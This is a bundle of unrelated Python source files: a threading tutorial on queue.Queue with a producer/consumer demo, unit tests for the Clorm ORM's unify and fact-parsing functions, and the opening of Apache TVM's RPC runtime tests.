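            'target': {'name': 'vm.instanceName', 'ident': 'vm.instanceId'},
        }],
    }],
}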
|
demo6.py
|
"""
[Multithreading] An introduction to the thread-safe Queue  2019/11/05 22:17
"""
# TODO: Queue, the thread-safe queue
"""
When accessing shared global variables from threads, taking a lock is a routine step. If what
you actually want is to store data in a queue, Python ships a thread-safe module for exactly
that: the queue module. It provides synchronized, thread-safe queue classes, including the
FIFO (first in, first out) Queue and the LIFO (last in, first out) LifoQueue.
These queues implement locking primitives (think of them as atomic operations: they either
do nothing or complete fully), so they can be used directly from multiple threads.
Queues can therefore be used to synchronize threads.
The relevant functions are:
1. Queue(num): create a FIFO queue that holds up to num items.
2. qsize(): return the size of the queue.
3. empty(): check whether the queue is empty.
4. full(): check whether the queue is full.
5. get(): remove and return an item from the queue (the oldest item for a FIFO queue).
6. put(): put an item into the queue.
"""
from queue import Queue
import time
import threading
"""
q = Queue(4)
# TODO: put items into the queue
q.put(1)
q.put(2)
q.put(3)
q.put(4)
# TODO: return the size of the queue
print(q.qsize()) # TODO: 4
# TODO: check whether the queue is empty
print(q.empty()) # TODO: False
# TODO: check whether the queue is full
print(q.full()) # TODO: True
# TODO: get the next item from the queue (FIFO)
print(q.get()) # TODO: 1
print('=' * 40)
"""
# TODO: put data into the queue
def set_value(q):
index = 0
while True:
q.put(index)
index += 1
time.sleep(3)
# TODO: get data from the queue
def get_value(q):
while True:
print('q.qsize(): %d, q.get(): %s' % (q.qsize(), q.get()))
def main():
q = Queue(4)
t1 = threading.Thread(target=set_value, args=(q,))
t2 = threading.Thread(target=get_value, args=(q,))
t1.start()
t2.start()
if __name__ == '__main__':
main()
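# Optional illustration (not invoked by main): put() blocks when the queue is
# full and get() blocks when it is empty, which is what lets the producer and
# consumer above cooperate without any explicit locks.
def blocking_demo():
    q = Queue(2)
    q.put('a')
    q.put('b')
    try:
        # The queue is already full, so this raises queue.Full after 0.5 seconds.
        q.put('c', timeout=0.5)
    except Exception as e:
        print('put timed out: %s' % type(e).__name__)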
|
test_orm_symbols_facts.py
|
#------------------------------------------------------------------------------
# Unit tests for the Clorm ORM SymbolPredicateUnifier and unify function.
#
# Note: I'm trying to clearly separate tests of the official Clorm API from
# tests of the internal implementation. Tests for the API have names
# "test_api_XXX" while non-API tests are named "test_nonapi_XXX". This is still
# to be completed.
# ------------------------------------------------------------------------------
import unittest,os
import tempfile
from .support import check_errmsg, add_program_string
from clingo import Control, Number, String, Function, SymbolType
from clorm import set_symbol_mode, SymbolMode
# Official Clorm API imports
from clorm.orm import \
BaseField, Raw, RawField, IntegerField, StringField, ConstantField, SimpleField, \
Predicate, ComplexTerm, path, hashable_path, FactBase
# Official Clorm API imports
from clorm import SymbolPredicateUnifier, unify, \
control_add_facts, symbolic_atoms_to_facts, \
parse_fact_string, parse_fact_files, \
UnifierNoMatchError, FactParserError, define_nested_list_field
#------------------------------------------------------------------------------
#------------------------------------------------------------------------------
__all__ = [
'UnifyTestCase',
'ClingoControlConvTestCase',
'ParseTestCase'
]
#------------------------------------------------------------------------------
#
#------------------------------------------------------------------------------
def hpaths(paths):
return [ hashable_path(path) for path in paths ]
#------------------------------------------------------------------------------
#
#------------------------------------------------------------------------------
class UnifyTestCase(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
#--------------------------------------------------------------------------
# Simple test to make sure that raw terms unify correctly
#--------------------------------------------------------------------------
def test_predicate_instance_raw_term(self):
raw1 = Function("func",[Number(1)])
raw2 = Function("bob",[String("no")])
rf1 = RawField()
rt1 = Function("tmp", [Number(1), raw1])
rt2 = Function("tmp", [Number(1), raw2])
class Tmp(Predicate):
n1 = IntegerField()
r1 = RawField()
self.assertTrue(Tmp._unify(rt1) is not None)
self.assertTrue(Tmp._unify(rt2) is not None)
t1 = Tmp(1,Raw(raw1))
t2 = Tmp(1,Raw(raw2))
self.assertTrue(Tmp._unify(rt2, rt2.arguments, rt2.name) == t2)
self.assertEqual(set([f for f in unify([Tmp], [rt1,rt2])]),set([t1,t2]))
self.assertEqual(t1.r1.symbol, raw1)
self.assertEqual(t2.r1.symbol, raw2)
#--------------------------------------------------------------------------
# Test a generator that takes n-1 Predicate types and a list of raw symbols
# as the last parameter, then tries to unify the raw symbols with the
# predicate types.
# --------------------------------------------------------------------------
def test_unify(self):
raws = [
Function("afact",[Number(1),String("test")]),
Function("afact",[Number(2),Number(3),String("test")]),
Function("afact",[Number(1),Function("fun",[Number(1)])]),
Function("bfact",[Number(3),String("test")])
]
class Afact1(Predicate):
anum=IntegerField()
astr=StringField()
class Meta: name = "afact"
class Afact2(Predicate):
anum1=IntegerField()
anum2=IntegerField()
astr=StringField()
class Meta: name = "afact"
class Afact3(Predicate):
class Fun(ComplexTerm):
fnum=IntegerField()
anum=IntegerField()
afun=Fun.Field()
# afun=ComplexField(Fun)
class Meta: name = "afact"
class Bfact(Predicate):
anum=IntegerField()
astr=StringField()
af1_1=Afact1(anum=1,astr="test")
af2_1=Afact2(anum1=2,anum2=3,astr="test")
af3_1=Afact3(anum=1,afun=Afact3.Fun(fnum=1))
bf_1=Bfact(anum=3,astr="test")
g1=list(unify([Afact1],raws))
g2=list(unify([Afact2],raws))
g3=list(unify([Afact3],raws))
g4=list(unify([Bfact],raws))
g5=list(unify([Afact1,Bfact],raws))
self.assertEqual([af1_1], g1)
self.assertEqual([af2_1], g2)
self.assertEqual([af3_1], g3)
self.assertEqual([bf_1], g4)
self.assertEqual([af1_1,bf_1], g5)
# Test the ordered option that returns a list of facts that preserves
# the order of the original symbols.
g1=unify([Afact1,Afact2,Bfact], raws, ordered=True)
self.assertEqual(g1, [af1_1,af2_1,bf_1])
#--------------------------------------------------------------------------
# Test unification with nullary predicates
# --------------------------------------------------------------------------
def test_unify_nullary(self):
raws = [
Function("afact",[Number(1),String("test")]),
Function("nullary1",[]),
Function("nullary2",[]),
Function("afact",[Number(2),String("test")]),
]
class Afact(Predicate):
anum=IntegerField()
astr=StringField()
class Meta: name = "afact"
class Nullary1(Predicate):
class Meta: name = "nullary1"
class Nullary2(Predicate):
class Meta: name = "nullary2"
af_1=Afact(anum=1,astr="test")
af_2=Afact(anum=2,astr="test")
u_1=Nullary1()
u_2=Nullary2()
self.assertEqual(list(unify([Nullary1],raws)),[u_1])
self.assertEqual(list(unify([Nullary2],raws)),[u_2])
self.assertEqual(set(unify([Afact,Nullary1,Nullary2],raws)),
set([af_1,af_2,u_1,u_2]))
#--------------------------------------------------------------------------
# Test unifying between predicates which have the same name-arity
# signature. There was a bug in the unify() function where one of the
# unifying classes was ignored, leading to failed unification.
# --------------------------------------------------------------------------
def test_unify_same_sig(self):
class ATuple(ComplexTerm):
aconst=ConstantField()
bint = IntegerField()
class Meta: is_tuple = True
class Fact1(Predicate):
aint = IntegerField()
aconst = ConstantField()
class Meta: name = "fact"
class Fact2(Predicate):
aint = IntegerField()
atuple = ATuple.Field()
class Meta: name = "fact"
r1 = Function("fact",[Number(1), Function("bob",[])])
r2 = Function("fact",[Number(1), Function("", [Function("bob",[]),Number(1)])])
# r1 only unifies with Fact1 and r2 only unifies with Fact2
f1 = Fact1._unify(r1)
self.assertEqual(f1.raw, r1)
self.assertEqual(Fact1._unify(r2), None)
f2 = Fact2._unify(r2)
self.assertEqual(f2.raw, r2)
self.assertEqual(Fact2._unify(r1), None)
# The unify() function should correctly unify both facts
res = unify([Fact1,Fact2],[r1,r2])
self.assertEqual(len(res), 2)
#--------------------------------------------------------------------------
# Test unifying between predicates which have the same name-arity
# signature to make sure the order of the predicate classes correctly
# corresponds to the order in which the facts are unified.
# --------------------------------------------------------------------------
def test_unify_same_sig2(self):
class Fact1(Predicate):
aint = IntegerField()
aconst = ConstantField()
class Meta: name = "fact"
class Fact2(Predicate):
aint = IntegerField()
araw = RawField()
class Meta: name = "fact"
r1 = Function("fact",[Number(1), Function("bob",[])])
r2 = Function("fact",[Number(1), Function("", [Function("bob",[]),Number(1)])])
# r1 only unifies with Fact1 but both r1 and r2 unify with Fact2
f1 = Fact1._unify(r1)
self.assertEqual(f1.raw, r1)
self.assertEqual(Fact1._unify(r2), None)
f1_alt = Fact2._unify(r1)
self.assertEqual(f1_alt.raw, r1)
f2 = Fact2._unify(r2)
self.assertEqual(f2.raw, r2)
# unify() unifies r1 with Fact1 (f1) and r2 with Fact2 (f2)
res = unify([Fact1,Fact2],[r1,r2])
self.assertEqual(len(res), 2)
self.assertTrue(f1 in res)
self.assertTrue(f2 in res)
# unify() unifies r1 and r2 with Fact2 (f1_alt and f2)
res = unify([Fact2,Fact1],[r1,r2])
self.assertEqual(len(res), 2)
self.assertTrue(f1_alt in res)
self.assertTrue(f2 in res)
#--------------------------------------------------------------------------
# Test unifying with negative facts
#--------------------------------------------------------------------------
def test_unify_signed_literals(self):
class F1(Predicate):
a = IntegerField
class Meta:
name = "f"
sign = True
class F2(Predicate):
a = IntegerField
class Meta:
name = "f"
sign = False
pos_raw1 = Function("f",[Number(1)])
pos_raw2 = Function("f",[Number(2)])
neg_raw1 = Function("f",[Number(1)],False)
neg_raw2 = Function("f",[Number(2)],False)
pos1 = F1(a=1)
pos2 = F1(a=2)
neg1 = F2(a=1,sign=False)
neg2 = F2(a=2,sign=False)
# unify with all raw
fb = unify([F1,F2], [ pos_raw1, pos_raw2, neg_raw1, neg_raw2])
self.assertEqual(len(fb), 4)
self.assertEqual(set(fb.query(F1).all()), set([pos1,pos2]))
self.assertEqual(set(fb.query(F2).all()), set([neg1,neg2]))
fb = unify([F1], [ pos_raw1, pos_raw2, neg_raw1, neg_raw2])
self.assertEqual(len(fb), 2)
self.assertEqual(fb.query(F1).count(), 2)
fb = unify([F2], [ pos_raw1, pos_raw2, neg_raw1, neg_raw2])
self.assertEqual(len(fb), 2)
self.assertEqual(fb.query(F2).count(), 2)
with self.assertRaises(ValueError) as ctx:
bad1 = F1(a=1,sign=False)
#--------------------------------------------------------------------------
# Test unify catching exceptions. When failing to convert a symbol to a
# python object we need to catch some exceptions. But we shouldn't catch all
# exceptions, otherwise genuine errors (like missing modules) will not be
# caught. Thanks to Susana Hahn for finding this problem.
# --------------------------------------------------------------------------
def test_unify_catch_exceptions(self):
# Define a class that converts strings but makes bad exceptions for any
# other input
class TmpField(BaseField):
def cltopy(raw):
if raw.type == SymbolType.String:
return raw.string
return blah.blah.error1(raw)
def pytocl(v):
if isinstance(v,str): return String(v)
import blah
return blah.error2(v)
# This is good
self.assertEqual(TmpField.cltopy(String("blah")), "blah")
self.assertEqual(TmpField.pytocl("blah"), String("blah"))
# Some things that should throw an exception
with self.assertRaises(AttributeError) as ctx:
r=TmpField.cltopy(1)
check_errmsg("'int' object has no attribute 'type'",ctx)
with self.assertRaises(NameError) as ctx:
r=TmpField.cltopy(Number(1))
check_errmsg("name 'blah' is not defined",ctx)
with self.assertRaises(ModuleNotFoundError) as ctx:
r=TmpField.pytocl(1)
check_errmsg("No module named 'blah'",ctx)
class F(Predicate):
v=TmpField
# Ok
raw=Function("f",[String("astring")])
unify([F],[raw])
# Bad
with self.assertRaises(NameError) as ctx:
raw=Function("f",[Number(1)])
unify([F],[raw])
check_errmsg("name 'blah' is not defined",ctx)
#--------------------------------------------------------------------------
# Test the factbasehelper with double decorators
#--------------------------------------------------------------------------
def test_symbolpredicateunifier(self):
# Using the SymbolPredicateUnifier as a decorator
spu1 = SymbolPredicateUnifier()
spu2 = SymbolPredicateUnifier()
spu3 = SymbolPredicateUnifier(suppress_auto_index=True)
# decorator both
@spu3.register
@spu2.register
@spu1.register
class Afact(Predicate):
num1=IntegerField(index=True)
num2=IntegerField()
str1=StringField()
# decorator without argument
@spu1.register
class Bfact(Predicate):
num1=IntegerField(index=True)
str1=StringField()
self.assertEqual(spu1.predicates, (Afact,Bfact))
self.assertEqual(spu2.predicates, (Afact,))
self.assertEqual(spu3.predicates, (Afact,))
self.assertEqual(set(hpaths(spu1.indexes)),
set(hpaths([Afact.num1,Bfact.num1])))
self.assertEqual(hpaths(spu2.indexes), hpaths([Afact.num1]))
self.assertEqual(spu3.indexes, ())
#--------------------------------------------------------------------------
# Test the symbolpredicateunifier when there are subfields defined
#--------------------------------------------------------------------------
def test_symbolpredicateunifier_with_subfields(self):
spu = SymbolPredicateUnifier()
class CT(ComplexTerm):
a = IntegerField
b = StringField(index=True)
c = (IntegerField(index=True),ConstantField)
@spu.register
class P(Predicate):
d = CT.Field(index=True)
e = CT.Field()
expected=set([hashable_path(P.d),
hashable_path(P.d.b), hashable_path(P.d.c.arg1),
hashable_path(P.e.b), hashable_path(P.e.c.arg1)])
self.assertEqual(spu.predicates, (P,))
self.assertEqual(set([hashable_path(p) for p in spu.indexes]), set(expected))
ct_func=Function("ct",[Number(1),String("aaa"),
Function("",[Number(1),Function("const",[])])])
p1=Function("p",[ct_func,ct_func])
fb=spu.unify(symbols=[p1],raise_on_empty=True)
self.assertEqual(len(fb),1)
self.assertEqual(set([hashable_path(p) for p in fb.indexes]), expected)
#--------------------------------------------------------------------------
# Test that subclass factbase works and we can specify indexes
#--------------------------------------------------------------------------
def test_symbolpredicateunifier_symbols(self):
class Afact(Predicate):
num1=IntegerField()
num2=IntegerField()
str1=StringField()
class Bfact(Predicate):
num1=IntegerField()
str1=StringField()
class Cfact(Predicate):
num1=IntegerField()
af1 = Afact(1,10,"bbb")
af2 = Afact(2,20,"aaa")
af3 = Afact(3,20,"aaa")
bf1 = Bfact(1,"aaa")
bf2 = Bfact(2,"bbb")
cf1 = Cfact(1)
raws = [
Function("afact",[Number(1), Number(10), String("bbb")]),
Function("afact",[Number(2), Number(20), String("aaa")]),
Function("afact",[Number(3), Number(20), String("aaa")]),
Function("bfact",[Number(1),String("aaa")]),
Function("bfact",[Number(2),String("bbb")]),
Function("cfact",[Number(1)])
]
spu = SymbolPredicateUnifier(predicates=[Afact,Bfact,Cfact])
# Test the different ways that facts can be added
fb = spu.unify(symbols=raws)
self.assertFalse(fb._delayed_init)
self.assertEqual(set(fb.predicates), set([Afact,Bfact,Cfact]))
s_af_all = fb.query(Afact)
self.assertEqual(set(s_af_all.all()), set([af1,af2,af3]))
fb = spu.unify(symbols=raws, delayed_init=True)
self.assertTrue(fb._delayed_init)
self.assertEqual(set(fb.predicates), set([Afact,Bfact,Cfact]))
s_af_all = fb.query(Afact)
self.assertEqual(set(s_af_all.all()), set([af1,af2,af3]))
fb = FactBase()
fb.add([af1,af2,af3])
#### self.assertEqual(fb.add([af1,af2,af3]),3)
s_af_all = fb.query(Afact)
self.assertEqual(set(s_af_all.all()), set([af1,af2,af3]))
fb = FactBase()
fb.add(af1)
fb.add(af2)
fb.add(af3)
#### self.assertEqual(fb.add(af1),1)
#### self.assertEqual(fb.add(af2),1)
#### self.assertEqual(fb.add(af3),1)
s_af_all = fb.query(Afact)
self.assertEqual(set(s_af_all.all()), set([af1,af2,af3]))
# Test that adding symbols can handle symbols that don't unify
fb = spu.unify(symbols=raws)
s_af_all = fb.query(Afact)
self.assertEqual(set(s_af_all.all()), set([af1,af2,af3]))
return
# Test the specification of indexes
class MyFactBase3(FactBase):
predicates = [Afact, Bfact]
spu = SymbolPredicateUnifier(predicates=[Afact,Bfact,Cfact],
indexes=[Afact.num1, Bfact.num1])
fb = spu.unify(symbols=raws)
s = fb.query(Afact).where(Afact.num1 == 1)
self.assertEqual(s.get_unique(), af1)
s = fb.query(Bfact).where(Bfact.num1 == 1)
self.assertEqual(s.get_unique(), bf1)
#------------------------------------------------------------------------------
# Functions that facilitate interactions with clingo.Control. Note: uses the
# multiprocessing library so that each run gets a fresh process and the solver
# is not prevented from releasing symbols between runs.
# ------------------------------------------------------------------------------
import multiprocessing as mp
class XP(Predicate):
x=IntegerField
class XQ(Predicate):
x=IntegerField
class XQ2(Predicate):
x=StringField
class Meta: name="xq"
def symbolic_atoms_to_facts_test1(q,facts_only):
prgstr="""xq(1). xq("a"). 1 { xp(1);xp(2) }2."""
ctrl=Control()
add_program_string(ctrl,prgstr)
ctrl.ground([("base",[])])
fb=symbolic_atoms_to_facts(ctrl.symbolic_atoms,[XP,XQ,XQ2],
facts_only=facts_only)
q.put(fb)
class ClingoControlConvTestCase(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
#--------------------------------------------------------------------------
# Basic test of adding facts into a control object
#--------------------------------------------------------------------------
def test_control_add_facts(self):
class F(Predicate):
anum = IntegerField
f1 = F(1) ; f2 = F(2)
ctrl = Control()
control_add_facts(ctrl,[f1,f2])
ctrl.ground([("base",[])])
model = None
with ctrl.solve(yield_=True) as sh:
for m in sh:
model=str(m)
self.assertEqual(model, "{} {}".format(f1,f2))
#--------------------------------------------------------------------------
# Test converting Control.symbolic_atoms to a factbase
#--------------------------------------------------------------------------
def test_symbolic_atoms_to_facts(self):
fb1_expected=FactBase([XP(1),XP(2),XQ(1),XQ2("a")])
fb2_expected=FactBase([XQ(1),XQ2("a")])
# Return all ground atoms
q=mp.Queue()
p=mp.Process(target=symbolic_atoms_to_facts_test1,args=(q,False))
p.start()
fb1_result=q.get()
p.join()
self.assertEqual(fb1_result,fb1_expected)
# Return only fact atoms
q=mp.Queue()
p=mp.Process(target=symbolic_atoms_to_facts_test1,args=(q,True))
p.start()
fb2_result=q.get()
p.join()
self.assertEqual(fb2_result,fb2_expected)
#------------------------------------------------------------------------------
# Tests of functions involved in parsing ASP ground facts into Clorm facts
#------------------------------------------------------------------------------
class ParseTestCase(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
#--------------------------------------------------------------------------
#
#--------------------------------------------------------------------------
def test_parse_facts(self):
class P(Predicate):
'''A P predicate'''
x=IntegerField
y=StringField
class Q(Predicate):
'''A Q predicate'''
x=ConstantField
y=P.Field
asp1="""p(1,"home\\""). -p(-2,"blah").\n"""
asp2=asp1 + """q(X,Y) :- p(X,Y)."""
fb_p=FactBase([P(1,"home\""),P(-2,"blah",sign=False)])
fb_in=FactBase([P(1,"home\""),
Q("abc",P(3,"H ome")),
Q("z",P(-1,"One more string")),
P(-2,"blah",sign=False)])
# Match a basic string with a rule
fb_out = parse_fact_string(asp2,unifier=[P,Q])
self.assertEqual(fb_p,fb_out)
# All inputs and outputs match
fb_out = parse_fact_string(fb_in.asp_str(),unifier=[P,Q])
self.assertEqual(fb_in,fb_out)
# Match only the p/2 facts
fb_out = parse_fact_string(fb_in.asp_str(),unifier=[P])
self.assertEqual(fb_p,fb_out)
# Match with comments
fb_out = parse_fact_string(fb_in.asp_str(commented=True),unifier=[P,Q])
self.assertEqual(fb_in,fb_out)
# Error on facts that fail to unify
with self.assertRaises(UnifierNoMatchError) as ctx:
fb_out = parse_fact_string(fb_in.asp_str(),unifier=[P],
raise_nomatch=True)
check_errmsg("Cannot unify symbol 'q(abc",ctx)
# Error on nonfact
with self.assertRaises(FactParserError) as ctx:
fb_out = parse_fact_string(asp2,unifier=[P],
raise_nonfact=True)
assert ctx.exception.line == 2
# Try the fact files parser
with tempfile.TemporaryDirectory() as tmpdirname:
fname=os.path.join(tmpdirname,"asp.lp")
with open(fname, "w+") as f:
f.write(fb_in.asp_str(commented=True))
fb_out=parse_fact_files([fname],unifier=[P,Q])
self.assertEqual(fb_in,fb_out)
# Option where a factbase is given
fb_out = FactBase()
parse_fact_string(fb_in.asp_str(commented=True),
unifier=[P,Q], factbase=fb_out)
self.assertEqual(fb_in,fb_out)
# Fact file parser where factbase is given
with tempfile.TemporaryDirectory() as tmpdirname:
fname=os.path.join(tmpdirname,"asp.lp")
with open(fname, "w+") as f:
f.write(fb_in.asp_str(commented=True))
fb_out = FactBase()
parse_fact_files([fname],unifier=[P,Q], factbase=fb_out)
self.assertEqual(fb_in,fb_out)
#--------------------------------------------------------------------------
#
#--------------------------------------------------------------------------
def test_lark_parse_facts(self):
class P(Predicate):
'''A P predicate'''
x=IntegerField
y=StringField
class Q(Predicate):
'''A Q predicate'''
x=ConstantField
y=P.Field
asp1="""p(1,"home\\""). -p(-2,"blah").\n"""
asp2=asp1 + """q(X,Y) :- p(X,Y)."""
fb_p=FactBase([P(1,"home\""),P(-2,"blah",sign=False)])
fb_in=FactBase([P(1,"home\""),
Q("abc",P(3,"H ome")),
Q("z",P(-1,"One more string")),
P(-2,"blah",sign=False)])
# Match a basic string with a rule
fb_out = parse_fact_string(asp2,unifier=[P,Q])
self.assertEqual(fb_p,fb_out)
# All inputs and outputs match
fb_out = parse_fact_string(fb_in.asp_str(),unifier=[P,Q])
self.assertEqual(fb_in,fb_out)
# Match only the p/2 facts
fb_out = parse_fact_string(fb_in.asp_str(),unifier=[P])
self.assertEqual(fb_p,fb_out)
# Match with comments
fb_out = parse_fact_string(fb_in.asp_str(commented=True),unifier=[P,Q])
self.assertEqual(fb_in,fb_out)
# Error on facts that fail to unify
with self.assertRaises(UnifierNoMatchError) as ctx:
fb_out = parse_fact_string(fb_in.asp_str(),unifier=[P],
raise_nomatch=True)
check_errmsg("Cannot unify symbol 'q(abc",ctx)
# Error on nonfact
with self.assertRaises(FactParserError) as ctx:
fb_out = parse_fact_string(asp2,unifier=[P],
raise_nonfact=True)
assert ctx.exception.line == 2
# Try the fact files parser
with tempfile.TemporaryDirectory() as tmpdirname:
fname=os.path.join(tmpdirname,"asp.lp")
with open(fname, "w+") as f:
f.write(fb_in.asp_str(commented=True))
fb_out=parse_fact_files([fname],unifier=[P,Q])
self.assertEqual(fb_in,fb_out)
# Option where a factbase is given
fb_out = FactBase()
parse_fact_string(fb_in.asp_str(commented=True),
unifier=[P,Q], factbase=fb_out)
self.assertEqual(fb_in,fb_out)
# Fact file parser where factbase is given
with tempfile.TemporaryDirectory() as tmpdirname:
fname=os.path.join(tmpdirname,"asp.lp")
with open(fname, "w+") as f:
f.write(fb_in.asp_str(commented=True))
fb_out = FactBase()
parse_fact_files([fname],unifier=[P,Q], factbase=fb_out)
self.assertEqual(fb_in,fb_out)
#--------------------------------------------------------------------------
# Test parsing some nested facts
#--------------------------------------------------------------------------
def test_parse_nested_facts(self):
class P(Predicate):
x=IntegerField
y=define_nested_list_field(ConstantField)
fb_in = FactBase([P(x=1,y=tuple(["a","b","c"]))])
aspstr = fb_in.asp_str()
fb_out = parse_fact_string(aspstr,unifier=[P],raise_nomatch=True)
self.assertEqual(fb_in,fb_out)
#--------------------------------------------------------------------------
# Test lark parsing some nested facts
#--------------------------------------------------------------------------
def test_lark_parse_nested_facts(self):
class P(Predicate):
x=IntegerField
y=define_nested_list_field(ConstantField)
set_symbol_mode(SymbolMode.NOCLINGO)
fb_in = FactBase([P(x=1,y=tuple(["a","b","c"]))])
aspstr = fb_in.asp_str()
fb_out = parse_fact_string(aspstr,unifier=[P],
raise_nomatch=True, raise_nonfact=True)
self.assertEqual(fb_in,fb_out)
set_symbol_mode(SymbolMode.CLINGO)
#--------------------------------------------------------------------------
# Parsing non-simple facts should raise FactParserError. Non-simple facts include:
# - a term with @-function call (this needs a Control object for grounding)
# - a disjunctive fact
# - a choice rule
# --------------------------------------------------------------------------
def test_parse_non_simple_facts(self):
class P(Predicate):
'''A P predicate'''
x=IntegerField
# Using an external function
asp="""p(@func(1))."""
with self.assertRaises(FactParserError) as ctx:
fb_out = parse_fact_string(asp,unifier=[P],raise_nonfact=True)
assert ctx.exception.line == 1
# A choice rule
asp="""{ p(2); p(3) }."""
with self.assertRaises(FactParserError) as ctx:
fb_out = parse_fact_string(asp,unifier=[P],raise_nonfact=True)
assert ctx.exception.line == 1
# A disjunctive fact
asp="""p(2); p(3)."""
with self.assertRaises(FactParserError) as ctx:
fb_out = parse_fact_string(asp,unifier=[P],raise_nonfact=True)
assert ctx.exception.line == 1
# A theory atom - let the general non-fact literal catch this
asp="""&diff{p(2)}."""
with self.assertRaises(FactParserError) as ctx:
fb_out = parse_fact_string(asp,unifier=[P],raise_nonfact=True)
assert ctx.exception.line == 1
#--------------------------------------------------------------------------
# Parsing non-simple facts should raise FactParserError in NOCLINGO mode (so
# using the lark parser).
# --------------------------------------------------------------------------
def test_lark_parse_non_simple_facts(self):
class P(Predicate):
'''A P predicate'''
x=IntegerField
set_symbol_mode(SymbolMode.NOCLINGO)
# Using an external function
asp="""p(@func(1))."""
with self.assertRaises(FactParserError) as ctx:
fb_out = parse_fact_string(asp,unifier=[P],raise_nonfact=True)
assert ctx.exception.line == 1
# A choice rule
asp="""{ p(2); p(3) }."""
with self.assertRaises(FactParserError) as ctx:
fb_out = parse_fact_string(asp,unifier=[P],raise_nonfact=True)
assert ctx.exception.line == 1
# A disjunctive fact
asp="""p(2); p(3)."""
with self.assertRaises(FactParserError) as ctx:
fb_out = parse_fact_string(asp,unifier=[P],raise_nonfact=True)
assert ctx.exception.line == 1
# A theory atom - let the general non-fact literal catch this
asp="""&diff{p(2)}."""
with self.assertRaises(FactParserError) as ctx:
fb_out = parse_fact_string(asp,unifier=[P],raise_nonfact=True)
assert ctx.exception.line == 1
set_symbol_mode(SymbolMode.CLINGO)
#------------------------------------------------------------------------------
# main
#------------------------------------------------------------------------------
if __name__ == "__main__":
raise RuntimeError('Cannot run modules')
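#------------------------------------------------------------------------------
# Hedged reference snippet (mirrors what the tests above exercise; the names
# are illustrative only): the minimal define-a-Predicate / unify round trip.
#------------------------------------------------------------------------------
def _example_unify_roundtrip():
    class Person(Predicate):
        pid = IntegerField()
        pname = StringField()
    # The raw clingo symbol person(1,"alice") unifies with the Person predicate.
    raw = Function("person", [Number(1), String("alice")])
    facts = list(unify([Person], [raw]))
    assert facts == [Person(pid=1, pname="alice")]
    return facts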
|
test_runtime_rpc.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import tvm
from tvm import te
import tvm.testing
import logging
import multiprocessing
import os
import stat
import sys
import time
import pytest
import numpy as np
from tvm import rpc
from tvm.contrib import utils, cc
from tvm.rpc.tracker import Tracker
if __name__ == "__main__":
# NOTE: must live here to avoid registering PackedFunc with libtvm.so twice.
sys.exit(pytest.main([__file__] + sys.argv[1:]))
# tkonolige: The issue as I understand it is this: multiprocessing's spawn
# method launches a new process and then imports the relevant modules. This
# means that all registered functions must exist at the top level scope. In
# this file they are, so all is well when we run this file directly.
# However, when run under pytest, the functions aren't registered on the
# server. I believe this is because pytest is also using multiprocessing to
# run individual functions. Somewhere along the way, the imports are being
# lost, so the server ends up not registering the functions.
pytestmark = pytest.mark.skipif(
# Windows does not support fork at all, so we still enable the tests on Windows
sys.platform.startswith("win") == False and multiprocessing.get_start_method() != "fork",
reason=(
"pytest + multiprocessing spawn method causes tvm.register_func to "
"not work on the rpc.Server."
),
)
@tvm.testing.requires_rpc
def test_bigendian_rpc():
"""Test big endian rpc when there is a PowerPC RPC server available"""
host = os.environ.get("TVM_POWERPC_TEST_HOST", None)
port = os.environ.get("TVM_POWERPC_TEST_PORT", 9090)
if host is None:
return
def verify_rpc(remote, target, shape, dtype):
A = te.placeholder(shape, dtype=dtype)
B = te.compute(A.shape, lambda i: A[i] + tvm.tir.const(1, A.dtype))
s = te.create_schedule(B.op)
f = tvm.build(s, [A, B], target, name="myadd")
dev = remote.cpu(0)
a = tvm.nd.array(np.random.randint(0, 256, size=shape).astype(A.dtype), device=dev)
b = tvm.nd.array(np.zeros(shape).astype(A.dtype), device=dev)
temp = utils.tempdir()
path_dso = temp.relpath("dev_lib.o")
f.save(path_dso)
remote.upload(path_dso)
f = remote.load_module("dev_lib.o")
f(a, b)
tvm.testing.assert_allclose(a.asnumpy() + 1, b.asnumpy())
print("Test RPC connection to PowerPC...")
remote = rpc.connect(host, port)
target = "llvm -mtriple=powerpc-linux-gnu"
for dtype in ["float32", "float64", "int32", "int8"]:
verify_rpc(remote, target, (10,), dtype)
@tvm.testing.requires_rpc
def test_rpc_simple():
server = rpc.Server(key="x1")
client = rpc.connect("127.0.0.1", server.port, key="x1")
f1 = client.get_function("rpc.test.addone")
assert f1(10) == 11
f3 = client.get_function("rpc.test.except")
with pytest.raises(tvm._ffi.base.TVMError):
f3("abc")
f2 = client.get_function("rpc.test.strcat")
assert f2("abc", 11) == "abc:11"
@tvm.testing.requires_rpc
def test_rpc_runtime_string():
server = rpc.Server(key="x1")
client = rpc.connect("127.0.0.1", server.port, key="x1")
func = client.get_function("rpc.test.runtime_str_concat")
x = tvm.runtime.container.String("abc")
y = tvm.runtime.container.String("def")
assert str(func(x, y)) == "abcdef"
@tvm.testing.requires_rpc
def test_rpc_array():
x = np.ones((3, 4))
server = rpc.Server()
remote = rpc.connect("127.0.0.1", server.port)
r_cpu = tvm.nd.array(x, remote.cpu(0))
assert str(r_cpu.device).startswith("remote")
np.testing.assert_equal(r_cpu.asnumpy(), x)
fremote = remote.get_function("rpc.test.remote_array_func")
fremote(r_cpu)
@tvm.testing.requires_rpc
def test_rpc_large_array():
# testcase of large array creation
server = rpc.Server()
remote = rpc.connect("127.0.0.1", server.port)
dev = remote.cpu(0)
a_np = np.ones((5041, 720)).astype("float32")
b_np = np.ones((720, 192)).astype("float32")
a = tvm.nd.array(a_np, dev)
b = tvm.nd.array(b_np, dev)
np.testing.assert_equal(a.asnumpy(), a_np)
np.testing.assert_equal(b.asnumpy(), b_np)
@tvm.testing.requires_rpc
def test_rpc_echo():
def check(remote):
fecho = remote.get_function("testing.echo")
assert fecho(1, 2, 3) == 1
assert fecho(100, 2, 3) == 100
assert fecho("xyz") == "xyz"
assert bytes(fecho(bytearray(b"123"))) == b"123"
